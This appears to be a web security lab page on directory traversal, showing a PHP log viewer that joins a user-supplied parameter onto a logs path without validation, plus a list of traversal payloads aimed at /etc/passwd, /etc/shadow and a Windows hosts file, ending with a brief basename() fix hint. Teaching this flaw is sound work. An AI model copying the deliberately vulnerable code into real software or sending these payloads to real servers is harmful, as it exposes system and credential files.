Directory Traversal in log file viewing functionality
This lab demonstrates a directory traversal vulnerability in a log file viewer system. The application constructs log file paths by concatenating user input without proper validation, allowing access to sensitive system files.
Objective: Access system files outside the logs directory using directory traversal sequences to view sensitive configuration files.
// Handle log file request
if (isset($_GET['log'])) {
$log = $_GET['log'];
// Vulnerable: No validation of log file path
$log_path = 'logs/' . $log;
if (file_exists($log_path) && is_file($log_path)) {
$log_content = file_get_contents($log_path);
// Display log content
} else {
// Error: Log file not found
}
}
// Example vulnerable usage:
// ?log=access.log
// ?log=../../../etc/passwd
// ?log=..\..\..\windows\system32\drivers\etc\hosts
logTry these payloads in the log parameter:
../../../etc/passwd - Linux system file..\..\..\windows\system32\drivers\etc\hosts - Windows system file../../../etc/hosts - Linux hosts file../../../proc/version - Linux system info../../../etc/shadow - Linux password fileExample URLs:
3.php?log=../../../etc/passwd3.php?log=..\..\..\windows\system32\drivers\etc\hostsClick these links to test the vulnerability:
basename() to extract filename only